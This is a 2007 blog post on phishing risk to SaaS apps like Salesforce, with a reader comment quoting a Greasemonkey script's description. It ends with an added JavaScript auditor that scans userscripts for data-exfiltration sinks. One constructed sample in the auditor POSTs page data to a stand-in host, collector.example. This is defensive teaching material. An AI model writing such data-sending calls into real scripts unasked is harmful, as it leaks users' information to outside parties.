December 09, 2007
Does Phishing Pose a Risk to SaaS Security?
A press release from Epstein Becker & Green, P.C. highlights the risk that SaaS applications may face from phishing, pointing to a November incident in which SalesForce.com was tricked into revealing a customer contact list.
In the press release, William H. Venema of the firm's Dallas office claims, "Proper structuring of software licensing arrangements can help protect users against security breaches such as those that occurred at SalesForce.com." He then suggests that licenses include provisions that address server and technician security.
If you are using or offering SaaS applications, what's your take on the risk posed by phishing? Post your comments here.
Posted by krissidanielsson in
If you want to be worried then consider this
http://www.japaninyourpalm.com/hacks/salesforcecoldcall.html
The site claims to offer a plugin for the Firefox browser (it looks like a simple JavaScript) that will extract data from your SalesForce application screen and place it in links to search engines and social networking sites so you can do some information digging on your 'prospect'.
If it works (and with the word hack in the URL you have to wonder) then the next simple step is to harvest all the information from the SalesForce Application screen and send it off to whoever might be interested in it.
They then get to construct really convincing e-mails to your customers for whatever purpose they might have in mind.
Amazingly good for anything that runs under WEB2.0 on a browser. Please tell me that it does not work. It's not as if the WEB2.0 developers have much control over browser security and it's not very credible to say to people 'Ooooh, you must be careful'.
Here's some of the text from the site.... I'm sure someone will want to shut it down, quite right too.
"Salesforce.com Cold Call Greasemonkey script
Want some recent news on your next call's business and competitors? With this script installed, we'll automatically add search links to Hoovers, Google News, Yahoo News, Technorati, YouTube and Wikipedia on your Account pages in Salesforce.com. The query words for your account's company name are built into the links. (Already have Greasemonkey? Get the script now.)
How does it work ?
Runs on top of the Salesforce.com Account web page.
Doesn't alter the salesforce.com application.
Injects a tiny bit of javascript every time you pull up a Salesforce.com Account page
Locates the area to the right of the "Account Detail" header
Finds the name of the company in the Account Name field
Builds new html and image links to the news resources and inserts this html in the Account Detail header, on the right
This script only functions on the Account page
Has no effect on the rest of the salesforce.com web pages or any other web pages.
This script only works on the Firefox browser
This script only affects your local view on your machine. i.e. nobody else sees it this way unless they've also installed the Salesforce Cold Call script. The Salesforce application has no knowledge of this script running on your machine.
Security is not an issue. You are not providing your salesforce.com password to the script or anything like this. The script only runs on your local browser, and you need to be signed into salesforce.com as usual. This script simply adds the html to the news links."
Of course we really believe it only does what it says it does.
Dave
Posted by: Dave at December 10, 2007 07:27 PM | Permalink
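Whether a userscript like the one quoted in the comment above only does what it says can be checked by reading its source before installing it. The following is an added example, not code from the original post or from the script's author: a heuristic static review in JavaScript, where the function name `auditUserscript`, both sample scripts and the host `collector.example` are constructed for illustration.

```javascript
// Heuristic pre-install review of a Greasemonkey userscript (added example).
// Patterns for ways a script can send data off the page or pull in more code.
const SINKS = {
  'GM_xmlhttpRequest': /\bGM_xmlhttpRequest\s*\(/,
  'XMLHttpRequest': /\bnew\s+XMLHttpRequest\b/,
  'fetch': /\bfetch\s*\(/,
  'sendBeacon': /\bsendBeacon\s*\(/,
  'image beacon': /\bnew\s+Image\b|createElement\(\s*['"]img['"]\s*\)/,
  'script injection': /createElement\(\s*['"]script['"]\s*\)/,
  'dynamic eval': /\beval\s*\(|\bnew\s+Function\s*\(/,
};

function auditUserscript(source, claimedHosts) {
  const meta = /\/\/\s*==UserScript==([\s\S]*?)\/\/\s*==\/UserScript==/.exec(source);
  const header = meta ? meta[1] : '';
  const body = meta ? source.slice(meta.index + meta[0].length) : source;
  const keys = (name) =>
    [...header.matchAll(new RegExp('//\\s*@' + name + '\\s+(\\S+)', 'g'))].map((m) => m[1]);
  const includes = keys('include');
  const findings = [];
  if (!meta) findings.push('no metadata block: script scope is unknown');
  // With no @include, Greasemonkey applies the script to every page.
  if (includes.length === 0 || includes.some((p) => /^(\*|https?:\/\/\*\/?\*?)$/.test(p)))
    findings.push('runs on every site');
  for (const url of keys('require')) findings.push('loads remote code: ' + url);
  for (const [name, re] of Object.entries(SINKS))
    if (re.test(body)) findings.push('can send data out: ' + name);
  // Hosts named in the code, compared with the ones the description admits to.
  const hosts = [...new Set([...body.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((m) => m[1].toLowerCase()))];
  const unexpectedHosts = hosts.filter((h) => !claimedHosts.some((c) => h === c || h.endsWith('.' + c)));
  return { includes, findings, unexpectedHosts };
}

// Constructed sample 1: only adds a search link on the CRM's pages.
const linkOnly = `// ==UserScript==
// @name     Account news links (constructed sample)
// @include  https://*.salesforce.com/*
// ==/UserScript==
var a = document.createElement('a');
a.href = 'http://news.google.com/news?q=' + encodeURIComponent(document.title);
document.body.appendChild(a);`;

// Constructed sample 2: same name, but scoped to all sites with a network call.
const harvesting = `// ==UserScript==
// @name     Account news links (constructed sample)
// @include  *
// ==/UserScript==
GM_xmlhttpRequest({ method: 'POST', url: 'https://collector.example/in', data: document.title });`;
```

A clean result is not proof of safety: markup written through `innerHTML` and obfuscated code pass these patterns, so the review supplements reading the script rather than replacing it.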